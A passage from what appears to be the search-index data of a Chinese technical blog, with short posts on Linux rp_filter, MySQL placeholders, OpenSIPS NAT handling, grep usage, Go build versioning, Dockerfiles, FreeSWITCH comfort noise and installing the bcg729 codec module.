the interface is not the best reverse path the packet check will fail. By default failed packets are discarded. 2 - Loose mode as defined in RFC3704 Loose Reverse Path Each incoming packet\u0026#39;s source address is also tested against the FIB and if the source address is not reachable via any interface the packet check will fail. Current recommended practice in RFC3704 is to enable strict mode to prevent IP spoofing from DDos attacks. If using asymmetric routing or other complicated routing, then loose mode is recommended. The max value from conf/{all,interface}/rp_filter is used when doing source validation on the {interface}. Default value is 0. Note that some distributions enable it in startup scripts. 参考 https://www.jianshu.com/p/717e6cd9d2bb https://www.jianshu.com/p/16d5c130670b https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt ","permalink":"https://wdd.js.org/network/rp_filter/","summary":"问题现象 主机上有两个网卡ens192和ens224。ens129网卡是对内网络的网卡,ens224是对网网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if the interface is not the best reverse path the packet check will fail.","title":"Linux内核参数rp_filter"},{"content":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholderhttps://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","permalink":"https://wdd.js.org/posts/2022/06/vvdqw6/","summary":" Error EXTRA *mysql.MySQLError=Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \u0026lsquo;? ( 然而我仔细看了看sql语句,没有看出来究竟哪里有sql报错。\n然而当我把作为placeholder的问号去掉,直接用表的名字,sql是可以直接执行的。我意识到这个可能是和placeholder有关。\n搜索了一下,看到一个链接 https://github.com/go-sql-driver/mysql/issues/848\nPlaceholder can\u0026rsquo;t be used for table name or column name. It\u0026rsquo;s MySQL spec. Not bug of this project.\n大意是说,placeholder是不能作为表名或者列名的。\n在mysql关于prepared文档介绍中,在允许使用prepared的语句里,没有看到create table可以用placeholderhttps://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html\nprepared语句的优点有以下几个\n优化查询速度 防止sql注入 但是也有一些限制\n不是所有语句都能用prepared语句。常见的用法应该是作为select where之后的条件,或者INSERT语句之后的值 不支持一个sql中多条查询语句的形式 ","title":"mysql placeholder的错误使用方式"},{"content":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见共有云的提供的云服务器,一般都有一个内网地址如192.16.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUT_IP, 随意对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网请求,携带的Via就被被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch9/nat-single-interface/","summary":" OPS \u0026lt;\u0026lt;\u0026lt;----------------------------- ingress 内网 | 公网 | | 192.168.2.11 | 1.2.3.4 INNER_IP | OUTER_IP | | ------------------------------\u0026gt;\u0026gt;\u0026gt; egress 常见共有云的提供的云服务器,一般都有一个内网地址如192.16.2.11和一个公网地址如1.2.3.4。 内网地址是配置在网卡上的;公网地址则只是一个映射,并未在网卡上配置。\n我们称从公网到内网的方向为ingress,从内网到公网的方向为egress。\n对于内网来说OpenSIPS的广播地址应该是INNER_IP, 所以对ingress方向的SIP请求,Via应该是INNER_IP。对于公网来说OpenSIPS的广播地址应该是OUT_IP, 随意对于egress方向的SIP请求,Via应该是OUTER_IP。\n我们模拟一下,假如设置了错误的Via的地址会怎样呢?\n例如从公网到内网的一个INVITE, 如果Via头加上的是OUTER_IP, 那么这个请求的响应也会被送到OPS的公网地址。但是由于网络策略和防火墙等原因,这个来自内网的响应很可能无法被送到OPS的公网地址。\n一般情况下,我们可以使用listen的as参数来设置对外的广告地址。\nlisten = udp:192.168.2.11:5060 as 1.2.3.4:5060 这样的情况下,从内网发送到公网请求,携带的Via就被被设置成1.2.3.4。\n但是也不是as设置的广告地址一定正确。这时候我们就可以用OpenSIPS提供的核心函数set_advertised_address或者set_advertised_port()来在脚本里自定义对外地址。\n例如:\nif (请求来自外网) { set_advertised_address(\u0026#34;192.168.2.11\u0026#34;); } else { set_advertised_address(\u0026#34;1.2.3.4\u0026#34;); } ","title":"NAT场景下的信令处理 - 单网卡"},{"content":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大 小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及 行号。 - m: 匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 gerp -E \u0026#39;ERROR|DEBUG\u0026#39; trace.log 9. 多文件:从多个.log文件中搜索含有ERROR的日志 grep ERROR *.log 10. 省略文件名:从多个.log文件中搜索ERROR字段日志,并不显示日志文件名 从多个文件中搜索的日志默认每行会带有日志文件名\ngrep -h ERROR *.log 11. 时间范围: 按照时间范围搜索日志 awk \u0026#39;$2\u0026gt;\u0026#34;17:30:00\u0026#34; \u0026amp;\u0026amp; $2\u0026lt;\u0026#34;18:00:00\u0026#34;\u0026#39; trace.log 日志形式如下, $2代表第二列即11:44:58, awk需要指定列\n11-21 16:44:58 /user/info/\n12. 有没有:搜索到第一个匹配行后就停止搜索 grep -m 1 ERROR trace.log 13. 使用正则提取字符串 grep -Eo \u0026#39;cause\u0026#34;:\u0026#34;(.*?)\u0026#34;\u0026#39; test.log cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;B\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; cause\u0026#34;:\u0026#34;A\u0026#34; 如果相对提取字符串的结果进行按照出现的次数进行排序,可以使用sort, uniq命令 grep -Eo \u0026lsquo;cause\u0026quot;:\u0026quot;(.*?)\u0026quot;\u0026rsquo; test.log | sort | uniq -c | sort -k1,1 -n\n步骤分解\nsort 对结果进行排序 uniq -c 对结果进行去重并统计出现次数 sort -k1,1 -n 按照第一列的结果,进行数值大小排序 ","permalink":"https://wdd.js.org/shell/grep-docs/","summary":"1. grep 常用参数 参考: GNU Grep 3.0\n--color:高亮显示匹配到的字符串 -v:显示不能被pattern匹配到的 -i:忽略字符大小写 -o:仅显示匹配到的字符串 -q:静默模式,不输出任何信息 -A#:after,匹配到的后#行 -B#:before,匹配到的前#行 -C#:context,匹配到的前后各#行 -E:使用ERE,支持使用扩展的正则表达式 -c:只输出匹配行的计数。 -I:不区分大 小写(只适用于单字符)。 -h:查询多文件时不显示文件名。 -l:查询多文件时只输出包含匹配字符的文件名。 -n:显示匹配行及 行号。 - m: 匹配多少个关键词之后就停止搜索 -s:不显示不存在或无匹配文本的错误信息。 -v:显示不包含匹配文本的所有行。 2. 普通:搜索trace.log 中含有ERROR字段的日志 grep ERROR trace.log 3. 输出文件:可以将日志输出文件中 grep ERROR trace.log \u0026gt; error.log 4. 反向:搜索不包含ERROR字段的日志 grep -v ERROR trace.log 5. 向前:搜索包含ERROR,并且显示ERROR前10行的日志 grep -B 10 ERROR trace.log 6. 向后:搜索包含ERROR字段,并且显示ERROR后10行的日志 grep -A 10 ERROR trace.log 7. 上下文:搜索包含ERROR字段,并且显示ERROR字段前后10行的日志 grep -C 10 ERROR trace.log 8. 多字段:搜索包含ERROR和DEBUG字段的日志 gerp -E \u0026#39;ERROR|DEBUG\u0026#39; trace.","title":"grep常用参考"},{"content":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","permalink":"https://wdd.js.org/shell/star-collect/","summary":"shell 自动化测试 https://github.com/bats-core/bats-core shell精进 https://github.com/NARKOZ/hacker-scripts https://github.com/trimstray/the-book-of-secret-knowledge https://legacy.gitbook.com/book/learnbyexample/command-line-text-processing https://github.com/dylanaraps/pure-bash-bible https://github.com/dylanaraps/pure-sh-bible https://github.com/Idnan/bash-guide https://github.com/denysdovhan/bash-handbook https://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html https://github.com/jlevy/the-art-of-command-line https://google.github.io/styleguide/shell.xml https://wiki.bash-hackers.org/start https://linuxguideandhints.com/ 安全加固 https://www.lisenet.com/2017/centos-7-server-hardening-guide/ https://highon.coffee/blog/security-harden-centos-7/ https://github.com/trimstray/the-practical-linux-hardening-guide https://github.com/decalage2/awesome-security-hardening https://www.hackingarticles.in/ https://github.com/toniblyx/my-arsenal-of-aws-security-tools ","title":"Shell 书籍和资料收藏"},{"content":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | ... | NM | +-----+-----+-----+-----+-----+ Figure 2: CN Payload Packing Format 在SIP INVITE的SDP中也可以看到编码,如下面的CN\nm=audio 20000 RTP/AVP 8 111 63 103 104 9 0 106 105 13 110 112 113 126 a=rtpmap:106 CN/32000 a=rtpmap:105 CN/16000 a=rtpmap:13 CN/8000 当VAD函数检测到没有人声时,就会发送舒适噪音。通常来说,只有当环境噪音发生变化的时候,才需要发送CN包。接收方在收到新的CN包后,会更新产生舒适噪音的参数。\n比如下图是sngrep抓包关于webrtc的呼叫时,就能看到浏览器送到SIP Server的CN包。\n│ \u0026lt;────────────────────────────────────────────────── RTP (g711a) 130 ───────────────────── │ ──────────────────────────────────── RTP (g711a) 130 ─────────────────────────────────\u0026gt; │ │ ────────────────────────────────────────────────── RTP (g711a) 1168 ───────────────────── │ \u0026lt;\u0026lt;\u0026lt;──── 200 OK (SDP) ────── │ │ │ │ ────────────────────── 200 OK (SDP) ──────────────────\u0026gt;\u0026gt;\u0026gt; │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────────────────────── ACK ───────────────────────── │ │ │ ──────────── ACK ─────────\u0026gt; │ │ │ │ \u0026lt;────────── INFO ────────── │ │ │ │ ────────────────────────── INFO ────────────────────────\u0026gt; │ │ │ \u0026lt;──────────────────────── 200 OK ──────────────────────── │ │ │ ────────── 200 OK ────────\u0026gt; │ │ │ │ \u0026lt;─────────────────────────────────────────────────── RTP (cn) 208 ─────────────────────── │ ───────────────────────────────────── RTP (cn) 208 ───────────────────────────────────\u0026gt; │ │ \u0026lt;────────────────────────── BYE ───────────────────────── │ │ FreeSWITCH WebRTC 录音质量差 FreeSWITCH bridge两个call leg, 一侧是WebRTC一侧是普通SIP终端,在录音的时候发现录音卡顿基本没办法听,但是双发通话的语音是正常的。\n最终发现录音质量差和舒适噪音有关。\n方案1: 全局抑制舒适噪音\n\u0026lt;!-- Video Settings --\u0026gt; \u0026lt;!-- Setting the max bandwdith --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_in=3mb\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_video_max_bandwidth_out=3mb\u0026#34;/\u0026gt; \u0026lt;!-- WebRTC Video --\u0026gt; \u0026lt;!-- Suppress CNG for WebRTC Audio --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;suppress_cng=true\u0026#34;/\u0026gt; \u0026lt;!-- Enable liberal DTMF for those that can\u0026#39;t get it right --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;rtp_liberal_dtmf=true\u0026#34;/\u0026gt; \u0026lt;!-- Helps with WebRTC Audio --\u0026gt; \u0026lt;!-- Stock Video Avatars --\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_mute_png=$${images_dir}/default-mute.png\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;video_no_avatar_png=$${images_dir}/default-avatar.png\u0026#34;/\u0026gt; 方案2: 在Bleg抑制舒适噪音\n\u0026lt;action application=\u0026#34;set\u0026#34; data=\u0026#34;bridge_generate_comfort_noise=true\u0026#34;/\u0026gt; \u0026lt;action application=\u0026#34;bridge\u0026#34; data=\u0026#34;sofia/user/1000\u0026#34;/\u0026gt; 参考 https://freeswitch.org/confluence/display/FREESWITCH/VAD+and+CNG https://www.rfc-editor.org/rfc/rfc3389 https://www.rfc-editor.org/rfc/rfc1890 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files#SofiaConfigurationFiles-suppress-cng https://freeswitch.org/confluence/display/FREESWITCH/bridge_generate_comfort_noise ","permalink":"https://wdd.js.org/freeswitch/webrtc-vad-cng/","summary":"人声检测 VAD 人声检测(VAD: Voice Activity Detection)是区分语音中是人说话的声音,还是其他例如环境音的一种功能。\n除此以外,人声检测还能用于减少网络中语音包传输的数据量,从而极大的降低语音的带宽,极限情况下能降低50%的带宽。\n在一个通话中,一般都是只有一个人说话,另一人听。很少可能是两个人都说话的。\n例如A在说话的时候,B可能在等待。\n虽然B在等待过程中,B的语音流依然再按照原始速度和编码再发给A, 即使这里面是环境噪音或者是无声。\nA ----\u0026gt; B # A在说话 A \u0026lt;--- B # B在等待过程中,B的语音流依然再按照原始速度和编码再发给A 如果B具有VAD检测功能,那么B就可以在不说话的时候,发送特殊标记的语音流或者通过减少语音流发送的频率,来减少无意义语音的发送。\n从而极大的降低B-\u0026gt;A的语音流。\n下图是Wireshark抓包的两种RTP包,g711编码的占214字节,但是用舒适噪音编码的只有63字节。将近减少了4倍的带宽。\n舒适噪音生成器 CNG 舒适噪音(CN stands for Comfort Noise), 是一种模拟的背景环境音。舒适噪音生成器在接收端根据发送到给的参数,来产生类似接收端的舒适噪音, 用来模拟发送方的噪音环境。\nCN也是一种RTP包的格式,定义在RFC 3389\n舒适噪音的payload, 也被称作静音插入描述帧(SID: a Silence Insertion Descriptor frame), 包括一个字节的数据,用来描述噪音的级别。也可以包含其他的额外的数据。早期版本的舒适噪音的格式定义在RFC 1890中,这个版本的格式只包含一个字段,就是噪音级别。\n噪音级别占用一个字节,其中第一个bit必须是0, 因此噪音级别有127中可能。\n0 1 2 3 4 5 6 7 +-+-+-+-+-+-+-+-+ |0| level | +-+-+-+-+-+-+-+-+ 跟着噪音级别的后续字节都是声音的频谱信息。\nByte 1 2 3 ... M+1 +-----+-----+-----+-----+-----+ |level| N1 | N2 | .","title":"WebRTC 人声检测与舒适噪音"},{"content":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation. https://golang.google.cn/cmd/go/#hdr-Build_modes https://www.digitalocean.com/community/tutorials/using-ldflags-to-set-version-information-for-go-applications ","permalink":"https://wdd.js.org/golang/inject-version/","summary":"暴露的变量必须用var定义,不能用const定义\n// main.go var VERSION = \u0026#34;unknow\u0026#34; var SHA = \u0026#34;unknow\u0026#34; var BUILD_TIME = \u0026#34;unknow\u0026#34; ... func main () { app := \u0026amp;cli.App{ Version: VERSION + \u0026#34;\\r\\nsha: \u0026#34; + SHA + \u0026#34;\\r\\nbuild time: \u0026#34; + BUILD_TIME, ... } Makefile\ntag?=v0.0.5 DATE?=$(shell date +%FT%T%z) VERSION_HASH = $(shell git rev-parse HEAD) LDFLAGS=\u0026#39;-X \u0026#34;main.VERSION=$(tag)\u0026#34; -X \u0026#34;main.SHA=$(VERSION_HASH)\u0026#34; -X \u0026#34;main.BUILD_TIME=$(DATE)\u0026#34;\u0026#39; build: CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags $(LDFLAGS) -o wellcli main.go 执行make build, 产生的二进制文件,就含有注入的信息了。\n-ldflags \u0026#39;[pattern=]arg list\u0026#39; arguments to pass on each go tool link invocation.","title":"在二进制文件中注入版本信息"},{"content":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","permalink":"https://wdd.js.org/golang/scratch-dockerfile/","summary":"FROM golang:1.16.2 as builder ENV GO111MODULE=on GOPROXY=https://goproxy.cn,direct WORKDIR /app COPY . . RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build . FROM scratch WORKDIR /app COPY --from=builder /app/your_app . # 配置时区 COPY --from=builder /usr/share/zoneinfo /usr/share/zoneinfo ENV TZ=Asia/Shanghai EXPOSE 8080 ENTRYPOINT [\u0026#34;./your_app\u0026#34;] ","title":"Golang Dockerfile"},{"content":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。\n","permalink":"https://wdd.js.org/posts/2022/05/hugo-blog-faq/","summary":"如何在markdown中插入图片 在static 目录中创建 images 目录,然后把图片放到images目录中。\n在文章中引用的时候\n![](/images/qianxun.jpeg#center) Warning 我之前创建的文件夹的名字叫做 img, 本地可以正常显示,但是部署之后,就无法显示图片了。\n最后我把img改成images才能正常在网页上显示。","title":"Hugo博客常见问题以及解决方案"},{"content":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g927模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编辑的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mob_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编辑mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码\n\u0026lt;param name=\u0026#34;disable-transcoding\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt; 然后重启fs, 进入到fs_cli中,输入: show codec, 看看有没有显示729编码。然后就是找话机,测试g729编码了。\n","permalink":"https://wdd.js.org/freeswitch/install-bcg729/","summary":"g729编码的占用带宽是g711的1/8,使用g729编码,可以极大的降低带宽的费用。fs原生的mod_g927模块是需要按并发数收费的,但是我们可以使用开源的bcg729模块。\n这里需要准备两个仓库,为了加快clone速度,我将这两个模块导入到gitee上。\nhttps://gitee.com/wangduanduan/mod_bcg729 https://gitee.com/wangduanduan/bcg729 安装前提 已经安装好了freeswitch, 编译mod_bcg729模块,需要指定freeswitch头文件的位置\nstep0: 切换到工作目录 cd /usr/local/src/ step1: clone mod_bcg729 git clone https://gitee.com/wangduanduan/mod_bcg729.git step2: clone bcg729 mod_bcg729模块在编辑的时候,会检查当前目录下有没有bcg729的目录。 如果没有这个目录,就会从github上clone bcg729的项目。 所以我们可以在编译之前,先把bcg729 clone到mob_bcg729目录下\ncd mod_bcg729 git clone https://gitee.com/wangduanduan/bcg729.git step3: 编辑mod_bcg729 编译mod_bcg729需要指定fs头文件switch.h的位置。 在Makefile项目里有FS_INCLUDES这个变量用来定义fs头文件的位置\nFS_INCLUDES=/usr/include/freeswitch FS_MODULES=/usr/lib/freeswitch/mod 如果你的源码头文件路径不是/usr/include/freeswitch, 则需要在执行make命令时通过参数指定, 例如下面编译的时候。\nmake FS_INCLUDES=/usr/local/freeswitch/include/freeswitch Tip 如何找到头文件的目录? 头文件一般在fs安装目录的include/freeswitch目录下 如果还是找不到,则可以使用 find /usr -name switch.h -type f 搜索对应的头文件 step4: 复制so文件 mod_bcg729编译之后,可以把生成的mod_bcg729.so拷贝到fs安装目录的mod目录下\nstep5: 加载模块 命令行加载\nload mod_bcg729 配置文件加载 命令行加载重启后就失效了,可以将加载的模块写入到配置文件中。 在modules.conf.xml中加入\n\u0026lt;load module=\u0026#34;mod_bcg729\u0026#34;/\u0026gt; step5: vars.xml修改 \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;global_codec_prefs=PCMU,PCMA,G729\u0026#34; /\u0026gt; \u0026lt;X-PRE-PROCESS cmd=\u0026#34;set\u0026#34; data=\u0026#34;outbound_codec_prefs=PCMU,PCMA,G729\u0026#34;/\u0026gt; \u0026lt;X-PRE-PROCESScmd=\u0026#34;set\u0026#34;data=\u0026#34;media_mix_inbound_outbound_codecs=true\u0026#34;/\u0026gt; step6: sip profile修改 开启转码","title":"安装bcg729模块"},{"content":"呼入到会议,正常来说,当会议室有且只有一人时,应该会报“当前只有一人的提示音”。但是测试的时候,输入了密码,进入了会议,却没有播报正常的提示音。\n经过排查发现,dialplan中,会议室的名字中含有@符号。\n按照fs的文档,发现@后面应该是profilename, 然而fs的conference.conf.xml却没有这个profile, 进而导致语音无法播报的问题。所以只要加入这个profile, 或者直接用@default, 就可以正确的播报语音了。\nAction data Description confname profile is \u0026ldquo;default\u0026rdquo;, no flags or pin confname+1234 profile is \u0026ldquo;default\u0026rdquo;, pin is 1234 confname@profilename+1234 profile is \u0026ldquo;profilename\u0026rdquo;, pin=1234, no flags confname+1234+flags{mute} profile is \u0026ldquo;default\u0026rdquo;, pin=1234, one flag confname++flags{endconf|moderator} profile is \u0026ldquo;default\u0026rdquo;, no p.i.n., multiple flags bridge:confname:1000@${domain_name} a 